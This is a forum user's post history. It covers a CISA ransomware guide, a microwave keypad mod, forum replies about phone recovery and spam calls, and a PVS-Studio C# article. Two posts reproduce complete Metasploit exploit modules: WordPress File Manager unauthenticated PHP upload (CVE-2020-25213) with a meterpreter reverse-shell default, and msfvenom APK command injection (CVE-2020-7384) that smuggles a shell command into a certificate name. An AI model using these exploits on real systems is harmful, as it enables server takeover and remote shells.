
Kev


Everything posted by Kev

  1. cisa.gov: On September 30, 2020, the Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released a joint Ransomware Guide, a customer-centered, one-stop resource with best practices and ways to prevent, protect against, and/or respond to a ransomware attack. CISA and MS-ISAC are distributing this guide to inform and enhance network defense and reduce exposure to ransomware attacks. The Ransomware Guide includes two resources: Part 1: Ransomware Prevention Best Practices; Part 2: Ransomware Response Checklist. Download: https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf Source
  2. I don't know what spoiled food you've been eating to make you go this off-topic/trolling; that's what I was referring to.
  3. Mechanical keyboards are all the rage these days! People love the satisfying tactile sensation, and some go to great lengths to customise them to their exact liking. That begs the question: if we love them that much, why stop at computer keyboards? If you think about it, there are plenty of everyday input devices in desperate need of mech-ing up! For example... a microwave keypad?? Yep, you heard that right! Here is the story of how I added an RGB OLED hot-swap mechanical keypad to create the most pimped-up microwave in the entire world! Click me for high-res video with sound! Background A year ago, I picked up a used microwave for £5 at a carboot sale. It was a "Proline Micro Chef ST44": It appears to be from the early 2000s, and is pretty unremarkable in every way. But it was cheap and it worked, so good enough for me! Problem! That is, until almost exactly a year later. I pressed the usual buttons to heat up my meal, but nothing happened. After the initial disbelief, my thorough investigation by randomly prodding buttons revealed that the membrane keypad was likely broken. At first a few buttons still worked, but soon all the buttons stopped responding. At this point I could have just chucked it and still got my money's worth. But it seemed like a waste to bin it just because a cheap plastic keypad had failed. Plus, I could save a few pounds if I fixed it instead of buying a new one. So I took it apart to see if there was anything I could do. Disassembly After removing the case, we can see the main circuit board: Microcontroller at top-middle Buzzer at top-right Blue ribbon connector for keypad at middle-left Transformer and control relays near the bottom The entire board is through-hole, but I guess if it works, it works! Here is the front side: The board is well marked, and it's interesting to see it uses a Vacuum Fluorescent Display (VFD), which was already falling out of favour by the time this was made.
I also noticed that this board, and in fact everything inside, was designed by Daewoo, a Korean conglomerate making everything from cars to, well, this. Anyway, back to the matter at hand. I thought I could just clean up the ribbon cable contacts and call it a day. Except I didn't notice the contacts were made from carbon (graphite?) instead of the usual metal, and I rubbed some right off: So if it wasn't broken then, it's definitely broken now. Great job! Enter the Matrix (Scanning) Still, it wasn't the end of the world. The keypad almost certainly uses Matrix Scanning to interface with the controller. There is a detailed introduction to this topic on Sparkfun. But in short, matrix scanning allows us to read a large number of inputs from a limited number of controller pins. For example, there are more than 100 keys on a computer keyboard. If we simply connected each key to an input pin, the controller chip would need more than 100 pins! It would be bulky, difficult to route, and expensive to produce. Instead, with a little cleverness in the firmware, we can arrange the buttons in a grid of columns and rows, AKA a matrix, like this: This way, by scanning a single row and column at a time, we can determine which key(s) are pressed. Of course there are a lot more technicalities, so read more here if you want. Anyway, in the example above, instead of 4 * 4 = 16 pins, we only need 4 + 4 = 8 pins, a saving of half! And with our computer keyboard, we will only need around 20 pins instead of more than 100! Thus, we can see that Matrix Scanning reduces the pin count and design complexity of input devices. Figuring Out the Matrix Back to our microwave keypad at hand. We can see its ribbon cable comes in two parts, each with 5 pins: So if my assumptions are correct, it would be a 5x5 matrix supporting up to 25 buttons. If you scroll all the way back up, you'll find the keypad has 24 buttons, so it checks out!
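To make the scanning idea concrete, here is a minimal C sketch of a 4x4 matrix scan. It is a software simulation for illustration only; the function names, matrix size, and simulated state are my own assumptions, not the microwave's or duckyPad's actual firmware. On real hardware, drive_column() would pull one column GPIO low and read_rows() would sample the row input pins.

```c
#include <assert.h>
#include <stdint.h>

#define ROWS 4
#define COLS 4

/* Simulated key state: pressed[r][c] = 1 means that switch is closed.
   On real hardware this state lives in the physical switches. */
static uint8_t pressed[ROWS][COLS];

static int active_col = -1;

/* On a real MCU this would pull one column GPIO low. */
static void drive_column(int c) { active_col = c; }

/* On a real MCU this would sample the row input pins. */
static uint8_t read_rows(void) {
    uint8_t bits = 0;
    for (int r = 0; r < ROWS; r++)
        if (pressed[r][active_col]) bits |= (uint8_t)(1u << r);
    return bits;
}

/* Scan column by column; out[r][c] = 1 for every closed switch. */
static void scan_matrix(uint8_t out[ROWS][COLS]) {
    for (int c = 0; c < COLS; c++) {
        drive_column(c);
        uint8_t rows = read_rows();
        for (int r = 0; r < ROWS; r++)
            out[r][c] = (uint8_t)((rows >> r) & 1u);
    }
}
```

The same loop, run fast enough, is how a keyboard controller reads 100+ keys with ~20 pins.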
Now that we know there are 5 columns and 5 rows, it's time to figure out which key is which. To do that, I desoldered the ribbon cable connector and replaced it with a straight male header: As a side note, the microcontroller is a TMP47C412AN designed by Toshiba. It is a 4-bit processor with 4KB of ROM and 128 bytes of RAM. It can also directly drive Vacuum Fluorescent Tubes. So all in all, a very specialised chip for appliances. Very underpowered compared to Arduinos and STM32s. But still, it gets the job done! I connected some jumper wires: And labeled the rows and columns 1-5 and A-E: I then put the board back, powered it on, and touched each pair of wires to see which button it registered as. It took a while, but eventually I figured out the matrix locations of the buttons I need: So all in all, 10 numpad keys and 4 control buttons. There are a bunch of other buttons, but I didn't bother with them since I don't use them anyway. I quickly whipped up a simple schematic: With that, I hard-wired some buttons on a perf board as a quick and dirty fix: It works! At least I'll have hot meals now! And it didn't cost me a dime. But as you can see, it is very messy with 10 wires coming out of the case, and I'm sure I could do better. Pimp It Up! Around the same time, I was working on duckyPad, a 15-key mechanical macropad with OLED, hot-swap, RGB, and sophisticated input automation with duckyScript: Feel free to check out the project page if you're interested! I called it a "Do-It-All Macropad", so to live up to its name, it was only natural that I get it working on my microwave too! And if I pull this off, my lowly 20-year-old second-hand broken microwave will transform into the only one in the entire world with mechanical switches and RGB lighting! Now that's what I call ... a Korean Custom 😅. However, it wasn't as easy as it sounds. There were a number of challenges: I want to use the existing duckyPad as-is, so no redesigning.
I want to keep it clean and tidy, so the fewer wires the better. It has to be powered by the microwave itself too. PMM Board Right now, there are 10 wires coming out of the case and into my hand-made keypad, very messy. Ideally, with duckyPad, I want to use only 3 wires: Power, Ground, and Data. With so few wires, they can run inside a single cable, which would be much cleaner and tidier. However, the microwave controller still expects 10 wires from the keypad matrix. So that means I would need an adapter of some sort. Let's just call it the PMM board. duckyPad would talk to the PMM board, which in turn talks to the microwave controller. Something like this: Not too bad! However, until now we have been using real switches with the keypad matrix. But with the PMM board, we will need to control the key matrix electronically to fool the microwave into thinking we pressed buttons! How do we do it? Blast From the Past It came as a bit of a surprise, but after some digging, it turned out that I had solved this exact problem 3 years ago! Back then, I was trying to automate inputs on Nintendo Switch Joycons, and they also used matrix scanning for their buttons. And the answer? Analogue switches! You can think of them as regular switches, but instead of pushing them with your fingers, they are controlled electronically. The chip I used is the ADG714 from Analog Devices. There are 8 switches in one chip, and they are controlled via a simple SPI protocol: I quickly designed the PMM board: It's a relatively simple board. An STM32F042F6P6 is used, and I broke out all of its pins on headers in case I need them. Since there are 14 buttons that I want to control, two ADG714s are needed. With SPI, they can be daisy-chained easily. You can see in the schematic that the analogue switches are wired up in exactly the same way as my shoddy hand-soldered keypad. Except now they can be pressed electronically by the microcontroller.
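Because two daisy-chained ADG714s behave like one 16-bit shift register, closing any combination of switches amounts to shifting out a 16-bit pattern and latching it. The following C sketch simulates that idea in software; the function names and pin handling are my own assumptions for illustration, not the real PMM board firmware, which would toggle actual SPI/GPIO lines.

```c
#include <assert.h>
#include <stdint.h>

/* Two daisy-chained ADG714s form one 16-bit shift register:
   bit i of 'states' controls switch i. Simulated in software here. */
static uint16_t shift_reg; /* bits currently travelling through the chain */
static uint16_t latched;   /* switch states applied on the latch edge */

/* On real hardware: set MOSI, pulse SCLK once. */
static void spi_clock_bit(int bit) {
    shift_reg = (uint16_t)((shift_reg << 1) | (bit & 1));
}

/* On real hardware: raise the SYNC line to apply the shifted bits. */
static void sync_latch(void) { latched = shift_reg; }

/* Close exactly the switches whose bits are set in 'states'. */
static void adg714_write(uint16_t states) {
    for (int i = 15; i >= 0; i--) /* shift MSB first */
        spi_clock_bit((states >> i) & 1);
    sync_latch();
}
```

With this scheme, "pressing" a microwave button is just adg714_write() with one bit set, then a second call with all bits clear to release it.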
I had the PCB made and soldered on all the components: I did some preliminary testing with a continuity beeper, and it seemed to work fine, but we'll only know for sure once it is installed on the real thing. Serial-ous Talk Now that the PMM board can control the button matrix, how should duckyPad talk to it? With only 1 wire for data, I reckoned that a simple one-way serial link should be more than enough. duckyPad would send a simple serial message at 115200bps every time a key is pressed. The PMM board receives it, and if the format is correct, it momentarily closes the corresponding analogue switch, simulating a button press to the microwave. I added a top-secret UARTPRINT command to the duckyScript parser, and created a profile for my microwave keypad. The keys on duckyPad are arranged as follows: Why So Negative? It's all coming together! Which brings us to the final question: how are we going to power it? I thought it would be straightforward. There is already a microcontroller on the microwave circuit board, so just tap its power and job done! Turns out, almost but not quite. Examining the circuit board in detail, it turns out the whole thing runs on negative voltages. We can see it gets -26V from the transformer, steps it down to -12V, then again to -5V. The voltage regulator is an S7905PIC fixed-negative-voltage regulator, further confirming this theory. I'm not sure why it is designed this way; it probably has something to do with the AC transformer. Still, it doesn't actually matter that much, as it's just a different point of reference. I tapped two power wires from the circuit board to power the PMM board, and in turn, duckyPad: To reduce confusion, I marked them 0V and -5V. Usually, we would connect 0V to GND, and a positive voltage to VCC. But in this case, 0V is actually at the higher potential. So all I needed to do was connect -5V to GND, and 0V to VCC. The potential difference is still 5V, so everything works.
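The receiving side of that one-way serial link can be sketched as a tiny state machine. Note that the two-byte frame used here ('K' header plus a key-index byte) is purely hypothetical, since the post does not spell out the actual duckyPad message layout; only the overall idea (validate the message, then momentarily close one analogue switch) comes from the text.

```c
#include <assert.h>
#include <stdint.h>

#define NUM_KEYS 14 /* 10 numpad keys + 4 control buttons */

static int last_pulsed = -1;

/* Momentarily close one analogue switch (press, short delay, release). */
static void pulse_switch(int key) { last_pulsed = key; }

/* Feed one received UART byte at a time.
   Hypothetical frame: 'K' header byte, then a key-index byte.
   Returns 1 when a valid frame has been handled, 0 otherwise. */
static int uart_feed(uint8_t byte) {
    static int have_header = 0;
    if (!have_header) {
        have_header = (byte == 'K');
        return 0;
    }
    have_header = 0;
    if (byte < NUM_KEYS) {
        pulse_switch(byte);
        return 1;
    }
    return 0; /* out-of-range index: drop the frame */
}
```

Malformed or out-of-range frames are silently dropped, which matters on a noisy single-wire link feeding a live appliance.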
(Eagle-eyed viewers might notice I also covered the buzzer with a sticker. It was so loud!) A Duckin' Great Time! I reinstalled the circuit board, hooked everything up and did a quick test: it works! You can see the 3 wires going from the duckyPad debug header to the PMM board, as well as the 10 wires going into the control board where the blue ribbon cable used to be. I attached the duckyPad to the microwave, chopped off the ends of a cheap USB cable, and used the 4 wires inside to connect everything up through a vent at the bottom. Voilà! It's done! The first and (probably) only microwave in the entire universe with mechanical switches, OLED, and RGB lighting! Have you ever experienced the crisp and clicky tactile and audible perfection of Gateron Greens while heating up some frozen junk food at 2am because you're too lazy to cook? Well, I have, so there's that! Click me for high-res video with sound! I want one too! If you're interested in duckyPad, you can learn more about it and get one here! And if you want the whole package, unfortunately it would be much more involved. Each microwave has a different keypad matrix layout, so you'll need to figure it out, then design and build a PMM board yourself. Not a small feat, but at least all the information is here! If you do go down this path, let me know if you have any questions! Of course, there are high voltages and the potential for microwave radiation when you take it apart, so be careful! Other Stuff I've done a few other fun projects over the years, feel free to check them out: Daytripper: Hide-my-windows Laser Tripwire: Saves the day while you slack off! exixe: Miniature Nixie Tube driver module: Eliminates the need for vintage chips and multiplexing circuits. From Arduino to STM32: A detailed tutorial to get you started with STM32 development. List of all my repos Questions or Comments?
Please feel free to open an issue, ask in the official duckyPad Discord, DM me on Discord (dekuNukem#6998), or email dekuNukem@gmail.com for inquiries. Source
  4. It wasn't encrypted, it's just a pattern lock. I found the phone again now, after years (2016, I think), so you can imagine I don't remember the pattern. 2. I have no way to replace the board; the guys at the service shop would make their own backup of my data, and I want to avoid that situation. 3. I followed a YouTube tutorial where an Indian guy explains how to recover it with the SDK and ADB (debugging), but it asks me to turn the antivirus off, and I'm not taking that risk.
  5. Hi, I have a Lenovo A2016a40 phone; a 17" wheel rim ran over it. I want to copy everything off it onto my PC (vacation pictures, etc.). It has a pattern lock and I no longer remember it (I used to connect it to a USB adapter with a mouse). I installed sync software, but... I can't tap Allow on the phone. Thank you!
  6. The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory.

     ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     class MetasploitModule < Msf::Exploit::Remote
       Rank = NormalRanking

       include Msf::Exploit::Remote::HTTP::Wordpress
       prepend Msf::Exploit::Remote::AutoCheck
       include Msf::Exploit::FileDropper

       def initialize(info = {})
         super(
           update_info(
             info,
             'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution',
             'Description' => %q{
               The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress
               allows remote attackers to upload and execute arbitrary PHP code because
               it renames an unsafe example elFinder connector file to have the .php
               extension. This, for example, allows attackers to run the elFinder
               upload (or mkfile and put) command to write PHP code into the
               wp-content/plugins/wp-file-manager/lib/files/ directory.
             },
             'License' => MSF_LICENSE,
             'Author' => [
               'Alex Souza (w4fz5uck5)', # initial discovery and PoC
               'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module
             ],
             'References' => [
               [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ],
               [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ],
               [ 'CVE', '2020-25213' ]
             ],
             'Platform' => [ 'php' ],
             'Privileged' => false,
             'Arch' => ARCH_PHP,
             'Targets' => [
               [
                 'WordPress File Manager 6.0-6.8',
                 { 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } }
               ]
             ],
             'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020
             'DefaultTarget' => 0
           )
         )

         register_options(
           [
             OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),
             OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]])
           ]
         )
       end

       def check
         return CheckCode::Unknown unless wordpress_and_online?

         # check the plugin version from readme
         check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0')
       end

       def exploit
         # base path to File Manager plugin
         file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager')

         # filename of the file to be uploaded/created
         filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php"
         register_file_for_cleanup(filename)

         case datastore['COMMAND']
         when 'upload'
           elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename)
         when 'mkfile+put'
           elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename)
           elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename)
         end

         payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename)
         print_status("#{peer} - Payload is at #{payload_uri}")

         # execute the payload
         send_request_cgi('uri' => normalize_uri(payload_uri))
       end

       # make it easier to switch between "upload" and "mkfile+put" exploit methods
       def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {})
         filename = opts['filename']

         # prep for exploit
         post_data = Rex::MIME::Message.new
         post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"')

         case elfinder_cmd
         when 'upload'
           post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
           post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"")
         when 'mkfile'
           post_data.add_part('l1_', nil, nil, 'form-data; name="target"')
           post_data.add_part(filename, nil, nil, 'form-data; name="name"')
         when 'put'
           post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"')
           post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"')
         end

         res = send_request_cgi(
           'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'),
           'method' => 'POST',
           'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
           'data' => post_data.to_s
         )

         fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
         fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
       end
     end

     Source
  7. This Metasploit module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affected are Metasploit Framework versions 6.0.11 and below and Metasploit Pro versions 4.18.0 and below.

     ##
     # This module requires Metasploit: https://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'rex/zip/jar'

     class MetasploitModule < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::FILEFORMAT

       def initialize(info = {})
         super(
           update_info(
             info,
             'Name' => 'Rapid7 Metasploit Framework msfvenom APK Template Command Injection',
             'Description' => %q{
               This module exploits a command injection vulnerability in Metasploit
               Framework's msfvenom payload generator when using a crafted APK file
               as an Android payload template. Affects Metasploit Framework <= 6.0.11
               and Metasploit Pro <= 4.18.0.

               The file produced by this module is a relatively empty yet valid-enough
               APK file. To trigger the vulnerability, the victim user should do the
               following: msfvenom -p android/<...> -x <crafted_file.apk>
             },
             'License' => MSF_LICENSE,
             'Author' => [
               'Justin Steven' # @justinsteven
             ],
             'References' => [
               ['URL', 'https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md'],
               ['CVE', '2020-7384'],
             ],
             'DefaultOptions' => { 'DisablePayloadHandler' => true },
             'Arch' => ARCH_CMD,
             'Platform' => 'unix',
             'Payload' => { 'BadChars' => "\x22\x2c\x5c\x0a\x0d" },
             'Targets' => [[ 'Automatic', {} ]],
             'Privileged' => false,
             'DisclosureDate' => '2020-10-29'
           )
         )

         register_options([
           OptString.new('FILENAME', [true, 'The APK file name', 'msf.apk'])
         ])
       end

       def build_x509_name
         name = "CN=';(#{payload.encoded}) >&- 2>&- & #"
         OpenSSL::X509::Name.parse(name)
       end

       def generate_signing_material
         key = OpenSSL::PKey::RSA.new(2048)
         cert = OpenSSL::X509::Certificate.new
         cert.version = 2
         cert.serial = 1
         cert.subject = cert.issuer = build_x509_name
         cert.public_key = key.public_key
         cert.not_before = Time.now
         # FIXME: this will break in the year 2037 on 32-bit systems
         cert.not_after = cert.not_before + 1.year

         # Self-sign the certificate, otherwise the victim's keytool gets unhappy
         cert.sign(key, OpenSSL::Digest::SHA256.new)

         [cert, key]
       end

       def exploit
         print_warning('Warning: bash payloads are unlikely to work') if datastore['PAYLOAD'].include?('bash')

         apk = Rex::Zip::Jar.new
         apk.build_manifest

         cert, key = generate_signing_material
         apk.sign(key, cert)
         data = apk.pack

         file_create(data)
       end
     end

     Source
  8. Kev

    Spam caller

    ^ {[ *In caz (keyboard slip, the u is next to the i) ]} \ You should have specified that. A word to the wise: do NOT call these numbers back, they are premium-rate (reverse-charge) numbers; you sit listening to music while running up a phone bill worth all the tickets to Cenaclul Flacara.
  9. It's not a secret that Microsoft has been working on the 8th version of the C# language for quite a while. The new language version (C# 8.0) is already available in the recent release of Visual Studio 2019, but it's still in beta. This new version is going to have a few features implemented in a somewhat non-obvious, or rather unexpected, way. Nullable Reference types are one of them. This feature is announced as a means to fight Null Reference Exceptions (NRE). It's good to see the language evolve and acquire new features to help developers. By coincidence, some time ago, we significantly enhanced the ability of PVS-Studio's C# analyzer to detect NREs. And now we're wondering if static analyzers in general, and PVS-Studio in particular, should still bother to diagnose potential null dereferences since, at least in new code that makes use of Nullable Reference, such dereferences will become "impossible"? Let's try to clear that up. Pros and cons of the new feature One reminder before we continue: the latest beta version of C# 8.0, available as of this writing, has Nullable Reference types disabled by default, i.e. the behavior of reference types hasn't changed. So what exactly are nullable reference types in C# 8.0 if we enable this option? They are basically the same good old reference types, except that now you'll have to add '?' after the type name (for example, string?), similarly to Nullable<T>, i.e. nullable value types (for example, int?). Without the '?', our string type will now be interpreted as a non-nullable reference, i.e. a reference type that can't be assigned null. Null Reference Exception is one of the most vexing exceptions to get in your program because it doesn't say much about its source, especially if the throwing method contains a number of dereference operations in a row.
The ability to prohibit null assignment to a variable of a reference type looks cool, but what about those cases where passing null to a method has some execution logic depending on it? Instead of null, we could, of course, use a literal, a constant, or simply an "impossible" value that logically can't be assigned to the variable anywhere else. But this poses a risk of replacing a crash of the program with "silent" but incorrect execution, which is often worse than facing the error right away. What about throwing an exception then? A meaningful exception thrown in a location where something went wrong is always better than an NRE somewhere up or down the stack. But it's only good in your own project, where you can correct the consumers by inserting a try-catch block, and it's solely your responsibility. When developing a library using (non) Nullable Reference, we need to guarantee that a certain method always returns a value. After all, it's not always possible (or at least easy), even in your own code, to replace the returning of null with exception throwing (since it may affect too much code). Nullable Reference can be enabled either at the global project level, by adding the NullableContextOptions property with the value enable, or at the file level, by means of the preprocessor directive: #nullable enable string cantBeNull = string.Empty; string? canBeNull = null; cantBeNull = canBeNull!; The Nullable Reference feature will make types more informative. The method signature gives you a clue about its behavior: whether it has a null check or not, and whether it can return null or not. Now, when you try using a nullable reference variable without checking it, the compiler will issue a warning. This is pretty convenient when using third-party libraries, but it also adds a risk of misleading the library's user, as it's still possible to pass null using the new null-forgiving operator (!).
That is, adding just one exclamation point can break all further assumptions about the interface using such variables: #nullable enable String GetStr() { return _count > 0 ? _str : null!; } String str = GetStr(); var len = str.Length; Yes, you can argue that this is bad programming and nobody would write code like that for real, but as long as this can potentially be done, you can't feel safe relying only on the contract imposed by the interface of a given method (saying that it can't return null). By the way, you could write the same code using several ! operators, as C# now allows you to do so (and such code is perfectly compilable): cantBeNull = canBeNull!!!!!!!; By writing it this way we, so to say, stress the idea: "look, this may be null!!!" (we in our team call this "emotional" programming). In fact, when building the syntax tree, the compiler (from Roslyn) interprets the ! operator in the same way as it interprets regular parentheses, which means you can write as many !'s as you like, just like with parentheses. But if you write enough of them, you can "knock down" the compiler. Maybe this will get fixed in the final release of C# 8.0. Similarly, you can circumvent the compiler warning when accessing a nullable reference variable without a check: canBeNull!.ToString(); Let's add more emotions: canBeNull!!!?.ToString(); You'll hardly ever see syntax like that in real code, though. By writing the null-forgiving operator we tell the compiler, "This code is okay, check not needed." By adding the Elvis operator we tell it, "Or maybe not; let's check it just in case." Now, you can reasonably ask why you can still have null assigned to variables of non-nullable reference types so easily if the very concept of these types implies that such variables can't have the value null? The answer is that "under the hood", at the IL code level, our non-nullable reference type is still...
the good old "regular" reference type, and the entire nullability syntax is actually just an annotation for the compiler's built-in analyzer (which, we believe, isn't quite convenient to use, but I'll elaborate on that later). Personally, we don't find it a "neat" solution to include the new syntax as simply an annotation for a third-party tool (even built into the compiler) because the fact that this is just an annotation may not be obvious at all to the programmer, as this syntax is very similar to the syntax for nullable structs yet works in a totally different way. Getting back to other ways of breaking Nullable Reference types. As of the moment of writing this article, when you have a solution comprised of several projects, passing a variable of a reference type, say, String from a method declared in one project to a method in another project that has the NullableContextOptions enabled will make the compiler assume it's dealing with a non-nullable String and the compiler will remain silent. And that's despite the tons of [Nullable(1)] attributes added to every field and method in the IL code when enabling Nullable References. These attributes, by the way, should be taken into account if you use reflection to handle the attributes and assume that the code contains only your custom ones. Such a situation may cause additional trouble when adapting a large code base to the Nullable Reference style. This process will likely be running for a while, project by project. If you are careful, of course, you can gradually integrate the new feature, but if you already have a working project, any changes to it are dangerous and undesirable (if it works, don't touch it!). That's why we made sure that you don't have to modify your source code or mark it to detect potential NREs when using PVS-Studio analyzer. To check locations that could throw a NullReferenceException, simply run the analyzer and look for V3080 warnings. 
No need to change the project's properties or the source code. No need to add directives, attributes, or operators. No need to change legacy code. When adding Nullable Reference support to PVS-Studio, we had to decide whether the analyzer should assume that variables of non-nullable reference types always have non-null values. After investigating the ways this guarantee could be broken, we decided that PVS-Studio shouldn't make such an assumption. After all, even if a project uses non-nullable reference types all the way through, the analyzer could add to this feature by detecting those specific situations where such variables could have the value null. How PVS-Studio looks for Null Reference Exceptions The dataflow mechanisms in PVS-Studio's C# analyzer track possible values of variables during the analysis process. This also includes interprocedural analysis, i.e. tracking down possible values returned by a method and its nested methods, and so on. In addition to that, PVS-Studio remembers variables that could be assigned null value. Whenever it sees such a variable being dereferenced without a check, whether it's in the current code under analysis, or inside a method invoked in this code, it will issue a V3080 warning about a potential Null Reference Exception. The idea behind this diagnostic is to have the analyzer get angry only when it sees a null assignment. This is the principal difference of our diagnostic's behavior from that of the compiler's built-in analyzer handling Nullable Reference types. The built-in analyzer will point at each and every dereference of an unchecked nullable reference variable - given that it hasn't been misled by the use of the ! operator or even just a complicated check (it should be noted, however, that absolutely any static analyzer, PVS-Studio being no exception here, can be "misled" one way or another, especially if you are intent on doing so). 
PVS-Studio, on the other hand, warns you only if it sees a null (whether within the local context or the context of an outside method). Even if the variable is of a non-nullable reference type, the analyzer will keep pointing at it if it sees a null assignment to that variable. This approach, we believe, is more appropriate (or at least more convenient for the user) since it doesn't demand "smearing" the entire code with null checks to track potential dereferences; after all, this option was available even before Nullable References were introduced, for example, through the use of contracts. What's more, the analyzer can now provide better control over non-nullable reference variables themselves. If such a variable is used "fairly" and never gets assigned null, PVS-Studio won't say a word. If the variable is assigned null and then dereferenced without a prior check, PVS-Studio will issue a V3080 warning: #nullable enable String GetStr() { return _count > 0 ? _str : null!; } String str = GetStr(); var len = str.Length; <== V3080: Possible null dereference. Consider inspecting 'str' Now let's take a look at some examples demonstrating how this diagnostic is triggered by the code of Roslyn itself. We already checked this project recently, but this time we'll be looking only at potential Null Reference Exceptions not mentioned in the previous articles. We'll see how PVS-Studio detects potential NREs and how they can be fixed using the new Nullable Reference syntax. V3080 [CWE-476] Possible null dereference inside method. Consider inspecting the 2nd argument: chainedTupleType. Microsoft.CodeAnalysis.CSharp TupleTypeSymbol.cs 244 NamedTypeSymbol chainedTupleType; if (_underlyingType.Arity < TupleTypeSymbol.RestPosition) { .... chainedTupleType = null; } else { ....
} return Create(ConstructTupleUnderlyingType(firstTupleType, chainedTupleType, newElementTypes), elementNames: _elementNames); As you can see, the chainedTupleType variable can be assigned the null value in one of the execution branches. It is then passed to the ConstructTupleUnderlyingType method and used there after a Debug.Assert check. It's a very common pattern in Roslyn, but keep in mind that Debug.Assert is removed in the release version. That's why the analyzer still considers the dereference inside the ConstructTupleUnderlyingType method dangerous. Here's the body of that method, where the dereference takes place: internal static NamedTypeSymbol ConstructTupleUnderlyingType( NamedTypeSymbol firstTupleType, NamedTypeSymbol chainedTupleTypeOpt, ImmutableArray<TypeWithAnnotations> elementTypes) { Debug.Assert (chainedTupleTypeOpt is null == elementTypes.Length < RestPosition); .... while (loop > 0) { .... currentSymbol = chainedTupleTypeOpt.Construct(chainedTypes); loop--; } return currentSymbol; } It's actually a matter of dispute whether the analyzer should take Asserts like that into account (some of our users want it to do so) - after all, the analyzer does take contracts from System.Diagnostics.Contracts into account. Here's one small real-life example from our experience of using Roslyn in our own analyzer. While adding support of the latest version of Visual Studio recently, we also updated Roslyn to its 3rd version. After that, PVS-Studio started crashing on certain code it had never crashed on before. The crash, accompanied by a Null Reference Exception, would occur not in our code but in the code of Roslyn. Debugging revealed that the code fragment where Roslyn was now crashing had that very kind of Debug.Assert based null check several lines higher - and that check obviously didn't help. 
It's a graphic example of how you can get into trouble with Nullable Reference because of the compiler treating Debug.Assert as a reliable check in any configuration. That is, if you add #nullable enable and mark the chainedTupleTypeOpt argument as a nullable reference, the compiler won't issue any warning on the dereference inside the ConstructTupleUnderlyingType method. Moving on to other examples of warnings by PVS-Studio. V3080 Possible null dereference. Consider inspecting 'effectiveRuleset'. RuleSet.cs 146 var effectiveRuleset = ruleSet.GetEffectiveRuleSet(includedRulesetPaths); effectiveRuleset = effectiveRuleset.WithEffectiveAction(ruleSetInclude.Action); if (IsStricterThan(effectiveRuleset.GeneralDiagnosticOption, ....)) effectiveGeneralOption = effectiveRuleset.GeneralDiagnosticOption; This warning says that the call of the WithEffectiveAction method may return null, while the return value assigned to the variable effectiveRuleset is not checked before use (effectiveRuleset.GeneralDiagnosticOption). Here's the body of the WithEffectiveAction method: public RuleSet WithEffectiveAction(ReportDiagnostic action) { if (!_includes.IsEmpty) throw new ArgumentException(....); switch (action) { case ReportDiagnostic.Default: return this; case ReportDiagnostic.Suppress: return null; .... return new RuleSet(....); default: return null; } } With Nullable Reference enabled for the method GetEffectiveRuleSet, we'll get two locations where the code's behavior has to be changed. Since the method shown above can throw an exception, it's logical to assume that the call to it is wrapped in a try-catch block and it would be correct to rewrite the method to throw an exception rather than return null. However, if you trace a few calls back, you'll see that the catching code is too far up to reliably predict the consequences. 
